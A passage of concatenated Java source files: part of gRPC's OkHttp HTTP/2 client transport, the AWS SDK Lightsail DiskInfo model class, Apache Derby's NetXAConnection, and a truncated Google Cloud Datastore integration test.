@GuardedBy("lock") private void setInUse() { if (!inUse) { inUse = true; listener.transportInUse(true); if (keepAliveManager != null) { // We have a new stream. We might need to do keepalives now. // Note that we have to do this inside the lock to avoid calling // KeepAliveManager.onTransportActive and KeepAliveManager.onTransportIdle in the wrong // order. keepAliveManager.onTransportActive(); } } } private Throwable getPingFailure() { synchronized (lock) { if (goAwayStatus != null) { return goAwayStatus.asException(); } else { return Status.UNAVAILABLE.withDescription("Connection closed").asException(); } } } boolean mayHaveCreatedStream(int streamId) { synchronized (lock) { return streamId < nextStreamId && (streamId & 1) == 1; } } OkHttpClientStream getStream(int streamId) { synchronized (lock) { return streams.get(streamId); } } /** * Returns a Grpc status corresponding to the given ErrorCode. */ @VisibleForTesting static Status toGrpcStatus(ErrorCode code) { Status status = ERROR_CODE_TO_STATUS.get(code); return status != null ? status : Status.UNKNOWN.withDescription( "Unknown http2 error code: " + code.httpCode); } /** * Runnable which reads frames and dispatches them to in flight calls. */ @VisibleForTesting class ClientFrameHandler implements FrameReader.Handler, Runnable { FrameReader frameReader; boolean firstSettings = true; ClientFrameHandler(FrameReader frameReader) { this.frameReader = frameReader; } @Override public void run() { String threadName = Thread.currentThread().getName(); Thread.currentThread().setName("OkHttpClientTransport"); try { // Read until the underlying socket closes. while (frameReader.nextFrame(this)) { if (keepAliveManager != null) { keepAliveManager.onDataReceived(); } } // frameReader.nextFrame() returns false when the underlying read encounters an IOException, // it may be triggered by the socket closing, in such case, the startGoAway() will do // nothing, otherwise, we finish all streams since it's a real IO issue. startGoAway(0, ErrorCode.INTERNAL_ERROR, Status.UNAVAILABLE.withDescription("End of stream or IOException")); } catch (Exception t) { // TODO(madongfly): Send the exception message to the server. startGoAway(0, ErrorCode.PROTOCOL_ERROR, Status.UNAVAILABLE.withCause(t)); } finally { try { frameReader.close(); } catch (IOException ex) { log.log(Level.INFO, "Exception closing frame reader", ex); } listener.transportTerminated(); // Restore the original thread name. Thread.currentThread().setName(threadName); } } /** * Handle a HTTP2 DATA frame. */ @Override public void data(boolean inFinished, int streamId, BufferedSource in, int length) throws IOException { OkHttpClientStream stream = getStream(streamId); if (stream == null) { if (mayHaveCreatedStream(streamId)) { frameWriter.rstStream(streamId, ErrorCode.INVALID_STREAM); in.skip(length); } else { onError(ErrorCode.PROTOCOL_ERROR, "Received data for unknown stream: " + streamId); return; } } else { // Wait until the frame is complete. in.require(length); Buffer buf = new Buffer(); buf.write(in.buffer(), length); synchronized (lock) { stream.transportDataReceived(buf, inFinished); } } // connection window update connectionUnacknowledgedBytesRead += length; if (connectionUnacknowledgedBytesRead >= Utils.DEFAULT_WINDOW_SIZE / 2) { frameWriter.windowUpdate(0, connectionUnacknowledgedBytesRead); connectionUnacknowledgedBytesRead = 0; } } /** * Handle HTTP2 HEADER and CONTINUATION frames. */ @Override public void headers(boolean outFinished, boolean inFinished, int streamId, int associatedStreamId, List<Header> headerBlock, HeadersMode headersMode) { boolean unknownStream = false; synchronized (lock) { OkHttpClientStream stream = streams.get(streamId); if (stream == null) { if (mayHaveCreatedStream(streamId)) { frameWriter.rstStream(streamId, ErrorCode.INVALID_STREAM); } else { unknownStream = true; } } else { stream.transportHeadersReceived(headerBlock, inFinished); } } if (unknownStream) { // We don't expect any server-initiated streams. onError(ErrorCode.PROTOCOL_ERROR, "Received header for unknown stream: " + streamId); } } @Override public void rstStream(int streamId, ErrorCode errorCode) { finishStream(streamId, toGrpcStatus(errorCode).augmentDescription("Rst Stream"), null); } @Override public void settings(boolean clearPrevious, Settings settings) { synchronized (lock) { if (OkHttpSettingsUtil.isSet(settings, OkHttpSettingsUtil.MAX_CONCURRENT_STREAMS)) { int receivedMaxConcurrentStreams = OkHttpSettingsUtil.get( settings, OkHttpSettingsUtil.MAX_CONCURRENT_STREAMS); maxConcurrentStreams = receivedMaxConcurrentStreams; } if (OkHttpSettingsUtil.isSet(settings, OkHttpSettingsUtil.INITIAL_WINDOW_SIZE)) { int initialWindowSize = OkHttpSettingsUtil.get( settings, OkHttpSettingsUtil.INITIAL_WINDOW_SIZE); outboundFlow.initialOutboundWindowSize(initialWindowSize); } if (firstSettings) { listener.transportReady(); firstSettings = false; } startPendingStreams(); } frameWriter.ackSettings(settings); } @Override public void ping(boolean ack, int payload1, int payload2) { if (!ack) { frameWriter.ping(true, payload1, payload2); } else { Http2Ping p = null; long ackPayload = (((long) payload1) << 32) | (payload2 & 0xffffffffL); synchronized (lock) { if (ping != null) { if (ping.payload() == ackPayload) { p = ping; ping = null; } else { log.log(Level.WARNING, String.format("Received unexpected ping ack. " + "Expecting %d, got %d", ping.payload(), ackPayload)); } } else { log.warning("Received unexpected ping ack. No ping outstanding"); } } // don't complete it while holding lock since callbacks could run immediately if (p != null) { p.complete(); } } } @Override public void ackSettings() { // Do nothing currently. } @Override public void goAway(int lastGoodStreamId, ErrorCode errorCode, ByteString debugData) { Status status = GrpcUtil.Http2Error.statusForCode(errorCode.httpCode) .augmentDescription("Received Goaway"); if (debugData != null && debugData.size() > 0) { // If a debug message was provided, use it. status = status.augmentDescription(debugData.utf8()); } startGoAway(lastGoodStreamId, null, status); } @Override public void pushPromise(int streamId, int promisedStreamId, List<Header> requestHeaders) throws IOException { // We don't accept server initiated stream. frameWriter.rstStream(streamId, ErrorCode.PROTOCOL_ERROR); } @Override public void windowUpdate(int streamId, long delta) { if (delta == 0) { String errorMsg = "Received 0 flow control window increment."; if (streamId == 0) { onError(ErrorCode.PROTOCOL_ERROR, errorMsg); } else { finishStream(streamId, Status.INTERNAL.withDescription(errorMsg), ErrorCode.PROTOCOL_ERROR); } return; } boolean unknownStream = false; synchronized (lock) { if (streamId == Utils.CONNECTION_STREAM_ID) { outboundFlow.windowUpdate(null, (int) delta); return; } OkHttpClientStream stream = streams.get(streamId); if (stream != null) { outboundFlow.windowUpdate(stream, (int) delta); } else if (!mayHaveCreatedStream(streamId)) { unknownStream = true; } } if (unknownStream) { onError(ErrorCode.PROTOCOL_ERROR, "Received window_update for unknown stream: " + streamId); } } @Override public void priority(int streamId, int streamDependency, int weight, boolean exclusive) { // Ignore priority change. // TODO(madongfly): log } @Override public void alternateService(int streamId, String origin, ByteString protocol, String host, int port, long maxAge) { // TODO(madongfly): Deal with alternateService propagation } } }
/* * Copyright 2014-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR * CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions * and limitations under the License. */ package com.amazonaws.services.lightsail.model; import java.io.Serializable; import javax.annotation.Generated; import com.amazonaws.protocol.StructuredPojo; import com.amazonaws.protocol.ProtocolMarshaller; /** * <p> * Describes a disk. * </p> * * @see <a href="http://docs.aws.amazon.com/goto/WebAPI/lightsail-2016-11-28/DiskInfo" target="_top">AWS API * Documentation</a> */ @Generated("com.amazonaws:aws-java-sdk-code-generator") public class DiskInfo implements Serializable, Cloneable, StructuredPojo { /** * <p> * The disk name. * </p> */ private String name; /** * <p> * The disk path. * </p> */ private String path; /** * <p> * The size of the disk in GB (e.g., <code>32</code>). * </p> */ private Integer sizeInGb; /** * <p> * A Boolean value indicating whether this disk is a system disk (has an operating system loaded on it). * </p> */ private Boolean isSystemDisk; /** * <p> * The disk name. * </p> * * @param name * The disk name. */ public void setName(String name) { this.name = name; } /** * <p> * The disk name. * </p> * * @return The disk name. */ public String getName() { return this.name; } /** * <p> * The disk name. * </p> * * @param name * The disk name. * @return Returns a reference to this object so that method calls can be chained together. */ public DiskInfo withName(String name) { setName(name); return this; } /** * <p> * The disk path. * </p> * * @param path * The disk path. */ public void setPath(String path) { this.path = path; } /** * <p> * The disk path. * </p> * * @return The disk path. */ public String getPath() { return this.path; } /** * <p> * The disk path. * </p> * * @param path * The disk path. * @return Returns a reference to this object so that method calls can be chained together. */ public DiskInfo withPath(String path) { setPath(path); return this; } /** * <p> * The size of the disk in GB (e.g., <code>32</code>). * </p> * * @param sizeInGb * The size of the disk in GB (e.g., <code>32</code>). */ public void setSizeInGb(Integer sizeInGb) { this.sizeInGb = sizeInGb; } /** * <p> * The size of the disk in GB (e.g., <code>32</code>). * </p> * * @return The size of the disk in GB (e.g., <code>32</code>). */ public Integer getSizeInGb() { return this.sizeInGb; } /** * <p> * The size of the disk in GB (e.g., <code>32</code>). * </p> * * @param sizeInGb * The size of the disk in GB (e.g., <code>32</code>). * @return Returns a reference to this object so that method calls can be chained together. */ public DiskInfo withSizeInGb(Integer sizeInGb) { setSizeInGb(sizeInGb); return this; } /** * <p> * A Boolean value indicating whether this disk is a system disk (has an operating system loaded on it). * </p> * * @param isSystemDisk * A Boolean value indicating whether this disk is a system disk (has an operating system loaded on it). */ public void setIsSystemDisk(Boolean isSystemDisk) { this.isSystemDisk = isSystemDisk; } /** * <p> * A Boolean value indicating whether this disk is a system disk (has an operating system loaded on it). * </p> * * @return A Boolean value indicating whether this disk is a system disk (has an operating system loaded on it). */ public Boolean getIsSystemDisk() { return this.isSystemDisk; } /** * <p> * A Boolean value indicating whether this disk is a system disk (has an operating system loaded on it). * </p> * * @param isSystemDisk * A Boolean value indicating whether this disk is a system disk (has an operating system loaded on it). * @return Returns a reference to this object so that method calls can be chained together. */ public DiskInfo withIsSystemDisk(Boolean isSystemDisk) { setIsSystemDisk(isSystemDisk); return this; } /** * <p> * A Boolean value indicating whether this disk is a system disk (has an operating system loaded on it). * </p> * * @return A Boolean value indicating whether this disk is a system disk (has an operating system loaded on it). */ public Boolean isSystemDisk() { return this.isSystemDisk; } /** * Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will be * redacted from this string using a placeholder value. * * @return A string representation of this object. * * @see java.lang.Object#toString() */ @Override public String toString() { StringBuilder sb = new StringBuilder(); sb.append("{"); if (getName() != null) sb.append("Name: ").append(getName()).append(","); if (getPath() != null) sb.append("Path: ").append(getPath()).append(","); if (getSizeInGb() != null) sb.append("SizeInGb: ").append(getSizeInGb()).append(","); if (getIsSystemDisk() != null) sb.append("IsSystemDisk: ").append(getIsSystemDisk()); sb.append("}"); return sb.toString(); } @Override public boolean equals(Object obj) { if (this == obj) return true; if (obj == null) return false; if (obj instanceof DiskInfo == false) return false; DiskInfo other = (DiskInfo) obj; if (other.getName() == null ^ this.getName() == null) return false; if (other.getName() != null && other.getName().equals(this.getName()) == false) return false; if (other.getPath() == null ^ this.getPath() == null) return false; if (other.getPath() != null && other.getPath().equals(this.getPath()) == false) return false; if (other.getSizeInGb() == null ^ this.getSizeInGb() == null) return false; if (other.getSizeInGb() != null && other.getSizeInGb().equals(this.getSizeInGb()) == false) return false; if (other.getIsSystemDisk() == null ^ this.getIsSystemDisk() == null) return false; if (other.getIsSystemDisk() != null && other.getIsSystemDisk().equals(this.getIsSystemDisk()) == false) return false; return true; } @Override public int hashCode() { final int prime = 31; int hashCode = 1; hashCode = prime * hashCode + ((getName() == null) ? 0 : getName().hashCode()); hashCode = prime * hashCode + ((getPath() == null) ? 0 : getPath().hashCode()); hashCode = prime * hashCode + ((getSizeInGb() == null) ? 0 : getSizeInGb().hashCode()); hashCode = prime * hashCode + ((getIsSystemDisk() == null) ? 0 : getIsSystemDisk().hashCode()); return hashCode; } @Override public DiskInfo clone() { try { return (DiskInfo) super.clone(); } catch (CloneNotSupportedException e) { throw new IllegalStateException("Got a CloneNotSupportedException from Object.clone() " + "even though we're Cloneable!", e); } } @com.amazonaws.annotation.SdkInternalApi @Override public void marshall(ProtocolMarshaller protocolMarshaller) { com.amazonaws.services.lightsail.model.transform.DiskInfoMarshaller.getInstance().marshall(this, protocolMarshaller); } }
/* Derby - Class org.apache.derby.client.net.NetXAConnection Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package org.apache.derby.client.net; import javax.transaction.xa.XAResource; import org.apache.derby.client.am.SqlException; import org.apache.derby.client.am.ClientStatement; import org.apache.derby.client.ClientPooledConnection; import org.apache.derby.client.am.ClientMessageId; import org.apache.derby.client.am.LogWriter; import org.apache.derby.client.BasicClientDataSource; import org.apache.derby.shared.common.reference.SQLState; import org.apache.derby.client.ClientAutoloadedDriver; public class NetXAConnection { private NetConnection netCon; //---------------------constructors/finalizer--------------------------------- // For XA Connections /** * * The construcor for the NetXAConnection. The parameter * is set to <code>this</code> from ClientXAConnection when * it creates an instance of NetXAConnection. This is then * passed on the underlying NetConnection constructor and is * used to raise StatementEvents from any PreparedStatement that * would be created from that NetConnection. * * @param logWriter LogWriter object associated with this connection * @param user user id for this connection * @param password password for this connection * @param dataSource The DataSource object passed from the ClientXAConnection * object from which this constructor was called * @param rmId The Resource manager ID for XA Connections * @param isXAConn true if this is a XA connection * @param cpc The ClientPooledConnection object from which this * NetConnection constructor was called. This is used * to pass StatementEvents back to the pooledConnection * object * @throws SqlException on error * */ public NetXAConnection( LogWriter logWriter, String user, String password, BasicClientDataSource dataSource, int rmId, boolean isXAConn, ClientPooledConnection cpc) throws SqlException { netCon = createNetConnection(logWriter, user, password, dataSource, rmId, isXAConn,cpc); checkPlatformVersion(); } public void setCorrelatorToken(byte[] crttoken) { netCon.crrtkn_ = crttoken; } void setNetXAResource(NetXAResource xares) { netCon.xares_ = xares; } private void writeLocalXACommit_() throws SqlException { netCon.netAgent_.netConnectionRequest_.writeLocalXACommit(netCon); } private void readLocalXACommit_() throws SqlException { netCon.netAgent_.netConnectionReply_.readLocalXACommit(netCon); } private void writeLocalXARollback_() throws SqlException { netCon.netAgent_.netConnectionRequest_.writeLocalXARollback(netCon); } private void readLocalXARollback_() throws SqlException { netCon.netAgent_.netConnectionReply_.readLocalXARollback(netCon); } void writeTransactionStart(ClientStatement statement) throws SqlException { //KATHEY remove below after checking that we don't need it. if (!netCon.isXAConnection()) { return; // not a XA connection } // this is a XA connection int xaState = netCon.getXAState(); netCon.xares_.exceptionsOnXA = null; //TODO: Looks like this can go and also the whole client indoubtTransaction code. /* if (xaState == XA_RECOVER) { // in recover, clean up and go to open-idle if (indoubtTransactions_ != null) { indoubtTransactions_.clear(); indoubtTransactions_ = null; setXAState(XA_OPEN_IDLE); xaState = XA_OPEN_IDLE; } }*/ // For derby we don't need to write transaction start for a local //transaction. If autocommit is off we are good to go. return; } void writeCommit() throws SqlException { // this logic must be in sync with willAutoCommitGenerateFlow() logic int xaState = netCon.getXAState(); if (xaState == netCon.XA_T0_NOT_ASSOCIATED){ netCon.xares_.callInfoArray_[ netCon.xares_.conn_.currXACallInfoOffset_ ].xid_ = NetXAResource.nullXid; writeLocalXACommit_(); } } void readCommit() throws SqlException { int xaState = netCon.getXAState(); NetXACallInfo callInfo = netCon.xares_.callInfoArray_ [netCon.currXACallInfoOffset_]; callInfo.xaRetVal_ = XAResource.XA_OK; // initialize XARETVAL if (xaState == netCon.XA_T0_NOT_ASSOCIATED) { readLocalXACommit_(); //TODO: Remove //setXAState(XA_LOCAL); } if (callInfo.xaRetVal_ != XAResource.XA_OK) { // xaRetVal has possible error, format it callInfo.xaFunction_ = NetXAResource.XAFUNC_COMMIT; netCon.xares_.xaRetValErrorAccumSQL(callInfo, 0); callInfo.xaRetVal_ = XAResource.XA_OK; // re-initialize XARETVAL throw netCon.xares_.exceptionsOnXA; } } void writeRollback() throws SqlException { netCon.xares_.callInfoArray_[ netCon.xares_.conn_.currXACallInfoOffset_ ].xid_ = netCon.xares_.nullXid; writeLocalXARollback_(); } void readRollback() throws SqlException { NetXACallInfo callInfo = netCon.xares_.callInfoArray_ [netCon.currXACallInfoOffset_]; callInfo.xaRetVal_ = XAResource.XA_OK; // initialize XARETVAL readLocalXARollback_(); if (callInfo.xaRetVal_ != XAResource.XA_OK) { // xaRetVal has possible error, format it callInfo.xaFunction_ = NetXAResource.XAFUNC_ROLLBACK; netCon.xares_.xaRetValErrorAccumSQL(callInfo, 0); callInfo.xaRetVal_ = XAResource.XA_OK; // re-initialize XARETVAL throw netCon.xares_.exceptionsOnXA; } // for all XA connectiions // TODO:KATHEY - Do we need this? netCon.setXAState(netCon.XA_T0_NOT_ASSOCIATED); } /** * Returns underlying net connection * @return NetConnection */ public NetConnection getNetConnection () { return netCon; } private void checkPlatformVersion() throws SqlException { int supportedVersion; supportedVersion = 8; if (netCon.xaHostVersion_ >= supportedVersion) { // supported version, return return; } // unsupported version for platform String platform = null; platform = "Linux, Unix, Windows"; throw new SqlException(netCon.agent_.logWriter_, new ClientMessageId(SQLState.NET_WRONG_XA_VERSION), platform, supportedVersion, netCon.xaHostVersion_); } /** * * Creates NetConnection for the supported version of jdbc. * This method can be overwritten to return NetConnection * of the supported jdbc version. * @param logWriter LogWriter object associated with this connection * @param user user id for this connection * @param password password for this connection * @param dataSource The DataSource object passed from the ClientXAConnection * object from which this constructor was called * @param rmId The Resource manager ID for XA Connections * @param isXAConn true if this is a XA connection * @param cpc The ClientPooledConnection object from which this * NetConnection constructor was called. This is used * to pass StatementEvents back to the pooledConnection * object * @return NetConnection * */ private NetConnection createNetConnection ( LogWriter logWriter, String user, String password, BasicClientDataSource dataSource, int rmId, boolean isXAConn, ClientPooledConnection cpc) throws SqlException { return (NetConnection)ClientAutoloadedDriver.getFactory().newNetConnection (logWriter, user, password,dataSource, rmId, isXAConn,cpc); } }
/* * Copyright 2015 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.cloud.datastore; import static org.easymock.EasyMock.createStrictMock; import static org.easymock.EasyMock.replay; import static org.easymock.EasyMock.verify; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertFalse; import static org.junit.Assert.assertNotEquals; import static org.junit.Assert.assertNotNull; import static org.junit.Assert.assertNull; import static org.junit.Assert.assertSame; import static org.junit.Assert.assertTrue; import static org.junit.Assert.fail; import com.google.cloud.ServiceOptions; import com.google.cloud.Timestamp; import com.google.cloud.datastore.Query.ResultType; import com.google.cloud.datastore.StructuredQuery.OrderBy; import com.google.cloud.datastore.StructuredQuery.PropertyFilter; import com.google.cloud.datastore.spi.DatastoreRpcFactory; import com.google.cloud.datastore.spi.v1.DatastoreRpc; import com.google.cloud.datastore.testing.LocalDatastoreHelper; import com.google.common.collect.ImmutableList; import com.google.common.collect.Iterators; import com.google.common.collect.Lists; import com.google.datastore.v1.BeginTransactionRequest; import com.google.datastore.v1.BeginTransactionResponse; import com.google.datastore.v1.CommitRequest; import com.google.datastore.v1.CommitResponse; import com.google.datastore.v1.EntityResult; import com.google.datastore.v1.LookupRequest; import com.google.datastore.v1.LookupResponse; import com.google.datastore.v1.PartitionId; import com.google.datastore.v1.QueryResultBatch; import com.google.datastore.v1.ReadOptions; import com.google.datastore.v1.ReadOptions.ReadConsistency; import com.google.datastore.v1.ReserveIdsRequest; import com.google.datastore.v1.ReserveIdsResponse; import com.google.datastore.v1.RollbackRequest; import com.google.datastore.v1.RollbackResponse; import com.google.datastore.v1.RunQueryRequest; import com.google.datastore.v1.RunQueryResponse; import com.google.datastore.v1.TransactionOptions; import com.google.protobuf.ByteString; import java.io.IOException; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import java.util.HashSet; import java.util.Iterator; import java.util.List; import java.util.Set; import java.util.concurrent.TimeoutException; import org.easymock.EasyMock; import org.junit.AfterClass; import org.junit.Assert; import org.junit.Before; import org.junit.BeforeClass; import org.junit.Test; import org.junit.runner.RunWith; import org.junit.runners.JUnit4; import org.threeten.bp.Duration; @RunWith(JUnit4.class) public class ITDatastoreTest { private static LocalDatastoreHelper helper = LocalDatastoreHelper.create(1.0); private static final DatastoreOptions options = helper.getOptions(); private static final Datastore datastore = options.getService(); private static final String PROJECT_ID = options.getProjectId(); private static final String KIND1 = "kind1"; private static final String KIND2 = "kind2"; private static final String KIND3 = "kind3"; private static final NullValue NULL_VALUE = NullValue.of(); private static final StringValue STR_VALUE = StringValue.of("str"); private static final BooleanValue BOOL_VALUE = BooleanValue.newBuilder(false).setExcludeFromIndexes(true).build(); private static final IncompleteKey INCOMPLETE_KEY1 = IncompleteKey.newBuilder(PROJECT_ID, KIND1).build(); private static final IncompleteKey INCOMPLETE_KEY2 = IncompleteKey.newBuilder(PROJECT_ID, KIND2).build(); private static final Key KEY1 = Key.newBuilder(INCOMPLETE_KEY1, "name").build(); private static final Key KEY2 = Key.newBuilder(KEY1, KIND2, 1).build(); private static final Key KEY3 = Key.newBuilder(KEY2).setName("bla").build(); private static final Key KEY4 = Key.newBuilder(KEY2).setName("newName1").build(); private static final Key KEY5 = Key.newBuilder(KEY2).setName("newName2").build(); private static final KeyValue KEY_VALUE = KeyValue.of(KEY1); private static final ListValue LIST_VALUE1 = ListValue.newBuilder().addValue(NULL_VALUE).addValue(STR_VALUE, BOOL_VALUE).build(); private static final ListValue LIST_VALUE2 = ListValue.of(Collections.singletonList(KEY_VALUE)); private static final ListValue EMPTY_LIST_VALUE = ListValue.of(Collections.<Value<?>>emptyList()); private static final TimestampValue TIMESTAMP_VALUE = new TimestampValue(Timestamp.now()); private static final LatLngValue LAT_LNG_VALUE = new LatLngValue(new LatLng(37.422035, -122.084124)); private static final FullEntity<IncompleteKey> PARTIAL_ENTITY1 = FullEntity.newBuilder(INCOMPLETE_KEY2) .set("str", STR_VALUE) .set("bool", BOOL_VALUE) .set("list", LIST_VALUE1) .build(); private static final FullEntity<IncompleteKey> PARTIAL_ENTITY2 = FullEntity.newBuilder(PARTIAL_ENTITY1) .remove("str") .set("bool", true) .set("list", LIST_VALUE1.get()) .build(); private static final FullEntity<IncompleteKey> PARTIAL_ENTITY3 = FullEntity.newBuilder(PARTIAL_ENTITY1) .setKey(IncompleteKey.newBuilder(PROJECT_ID, KIND3).build()) .build(); private static final Entity ENTITY1 = Entity.newBuilder(KEY1) .set("str", STR_VALUE) .set("date", TIMESTAMP_VALUE) .set("latLng", LAT_LNG_VALUE) .set("bool", BOOL_VALUE) .set("partial1", EntityValue.of(PARTIAL_ENTITY1)) .set("list", LIST_VALUE2) .set("emptyList", EMPTY_LIST_VALUE) .build(); private static final Entity ENTITY2 = Entity.newBuilder(ENTITY1) .setKey(KEY2) .remove("str") .set("name", "Dan") .setNull("null") .set("age", 20) .build(); private static final Entity ENTITY3 = Entity.newBuilder(ENTITY1) .setKey(KEY3) .remove("str") .set("null", NULL_VALUE) .set("partial1", PARTIAL_ENTITY2) .set("partial2", ENTITY2) .build(); private DatastoreOptions rpcMockOptions; private DatastoreRpcFactory rpcFactoryMock; private DatastoreRpc rpcMock; @BeforeClass public static void beforeClass() throws IOException, InterruptedException { helper.start(); } @Before public void setUp() { rpcFactoryMock = EasyMock.createStrictMock(DatastoreRpcFactory.class); rpcMock = EasyMock.createStrictMock(DatastoreRpc.class); rpcMockOptions = options .toBuilder() .setRetrySettings(ServiceOptions.getDefaultRetrySettings()) .setServiceRpcFactory(rpcFactoryMock) .build(); EasyMock.expect(rpcFactoryMock.create(rpcMockOptions)).andReturn(rpcMock); StructuredQuery<Key> query = Query.newKeyQueryBuilder().build(); QueryResults<Key> result = datastore.run(query); datastore.delete(Iterators.toArray(result, Key.class)); datastore.add(ENTITY1, ENTITY2); } @AfterClass public static void afterClass() throws IOException, InterruptedException, TimeoutException { helper.stop(Duration.ofMinutes(1)); } @Test public void testGetOptions() { assertSame(options, datastore.getOptions()); } @Test public void testNewTransactionCommit() { Transaction transaction = datastore.newTransaction(); transaction.add(ENTITY3); Entity entity2 = Entity.newBuilder(ENTITY2).clear().setNull("bla").build(); transaction.update(entity2); transaction.delete(KEY1); transaction.commit(); List<Entity> list = datastore.fetch(KEY1, KEY2, KEY3); assertNull(list.get(0)); assertEquals(entity2, list.get(1)); assertEquals(ENTITY3, list.get(2)); assertEquals(3, list.size()); try { transaction.commit(); fail("Expecting a failure"); } catch (DatastoreException ex) { // expected to fail } try { transaction.rollback(); fail("Expecting a failure"); } catch (DatastoreException ex) { // expected to fail } verifyNotUsable(transaction); } @Test public void testTransactionWithRead() { Transaction transaction = datastore.newTransaction(); assertNull(transaction.get(KEY3)); transaction.add(ENTITY3); transaction.commit(); assertEquals(ENTITY3, datastore.get(KEY3)); transaction = datastore.newTransaction(); assertEquals(ENTITY3, transaction.get(KEY3)); // update entity3 during the transaction datastore.put(Entity.newBuilder(ENTITY3).clear().build()); transaction.update(ENTITY2); try { transaction.commit(); fail("Expecting a failure"); } catch (DatastoreException expected) { assertEquals("ABORTED", expected.getReason()); } } @Test public void testTransactionWithQuery() { Query<Entity> query = Query.newEntityQueryBuilder() .setKind(KIND2) .setFilter(PropertyFilter.hasAncestor(KEY2)) .build(); Transaction transaction = datastore.newTransaction(); QueryResults<Entity> results = transaction.run(query); assertEquals(ENTITY2, results.next()); assertFalse(results.hasNext()); transaction.add(ENTITY3); transaction.commit(); assertEquals(ENTITY3, datastore.get(KEY3)); transaction = datastore.newTransaction(); results = transaction.run(query); assertEquals(ENTITY2, results.next()); transaction.delete(ENTITY3.getKey()); // update entity2 during the transaction datastore.put(Entity.newBuilder(ENTITY2).clear().build()); try { transaction.commit(); fail("Expecting a failure"); } catch (DatastoreException expected) { assertEquals("ABORTED", expected.getReason()); } } @Test public void testNewTransactionRollback() { Transaction transaction = datastore.newTransaction(); transaction.add(ENTITY3); Entity entity2 = Entity.newBuilder(ENTITY2) .clear() .setNull("bla") .set("list3", StringValue.of("bla"), StringValue.newBuilder("bla").build()) .build(); transaction.update(entity2); transaction.delete(KEY1); transaction.rollback(); transaction.rollback(); // should be safe to repeat rollback calls try { transaction.commit(); fail("Expecting a failure"); } catch (DatastoreException ex) { // expected to fail } verifyNotUsable(transaction); List<Entity> list = datastore.fetch(KEY1, KEY2, KEY3); assertEquals(ENTITY1, list.get(0)); assertEquals(ENTITY2, list.get(1)); assertNull(list.get(2)); assertEquals(3, list.size()); } @Test public void testRunInTransactionWithReadWriteOption() { EasyMock.expect(rpcMock.beginTransaction(EasyMock.anyObject(BeginTransactionRequest.class))) .andReturn(BeginTransactionResponse.getDefaultInstance()); EasyMock.expect(rpcMock.rollback(EasyMock.anyObject(RollbackRequest.class))) .andReturn(RollbackResponse.getDefaultInstance()) .once(); EasyMock.expect(rpcMock.beginTransaction(EasyMock.anyObject(BeginTransactionRequest.class))) .andReturn(BeginTransactionResponse.getDefaultInstance()); EasyMock.expect(rpcMock.commit(EasyMock.anyObject(CommitRequest.class))) .andReturn(CommitResponse.newBuilder().build()); EasyMock.replay(rpcFactoryMock, rpcMock); Datastore mockDatastore = rpcMockOptions.getService(); Datastore.TransactionCallable<Integer> callable = new Datastore.TransactionCallable<Integer>() { private Integer attempts = 1; @Override public Integer run(DatastoreReaderWriter transaction) { if (attempts < 2) { ++attempts; throw new DatastoreException(10, "", "ABORTED", false, null); } return attempts; } }; TransactionOptions options = TransactionOptions.newBuilder() .setReadWrite(TransactionOptions.ReadWrite.getDefaultInstance()) .build(); Integer result = mockDatastore.runInTransaction(callable, options); EasyMock.verify(rpcFactoryMock, rpcMock); assertEquals(2, result.intValue()); } private void verifyNotUsable(DatastoreWriter writer) { try { writer.add(ENTITY3); fail("Expecting a failure"); } catch (DatastoreException ex) { // expected to fail } try { writer.put(ENTITY3); fail("Expecting a failure"); } catch (DatastoreException ex) { // expected to fail } try { writer.update(ENTITY3); fail("Expecting a failure"); } catch (DatastoreException ex) { // expected to fail } try { writer.delete(ENTITY3.getKey()); fail("Expecting a failure"); } catch (DatastoreException ex) { // expected to fail } } @Test public void testNewBatch() { Batch batch = datastore.newBatch(); Entity entity1 = Entity.newBuilder(ENTITY1).clear().build(); Entity entity2 = Entity.newBuilder(ENTITY2).clear().setNull("bla").build(); Entity entity4 = Entity.newBuilder(KEY4).set("value", StringValue.of("value")).build(); Entity entity5 = Entity.newBuilder(KEY5).set("value", "value").build(); List<Entity> entities = batch.add(entity4, PARTIAL_ENTITY2, entity5); Entity entity6 = entities.get(1); assertSame(entity4, entities.get(0)); assertEquals(PARTIAL_ENTITY2.getProperties(), entity6.getProperties()); assertEquals(PARTIAL_ENTITY2.getKey().getProjectId(), entity6.getKey().getProjectId()); assertEquals(PARTIAL_ENTITY2.getKey().getNamespace(), entity6.getKey().getNamespace()); assertEquals(PARTIAL_ENTITY2.getKey().getAncestors(), entity6.getKey().getAncestors()); assertEquals(PARTIAL_ENTITY2.getKey().getKind(), entity6.getKey().getKind()); assertEquals(PARTIAL_ENTITY2.getKey(), IncompleteKey.newBuilder(entity6.getKey()).build()); assertNotEquals(PARTIAL_ENTITY2.getKey().getPath(), entity6.getKey().getPath()); assertNotEquals(PARTIAL_ENTITY2.getKey(), entity6.getKey()); assertSame(entity5, entities.get(2)); batch.addWithDeferredIdAllocation(PARTIAL_ENTITY3); batch.put(ENTITY3, entity1, entity2); Batch.Response response = batch.submit(); entities = datastore.fetch(KEY1, KEY2, KEY3, entity4.getKey(), entity5.getKey(), entity6.getKey()); assertEquals(entity1, entities.get(0)); assertEquals(entity2, entities.get(1)); assertEquals(ENTITY3, entities.get(2)); assertEquals(entity4, entities.get(3)); 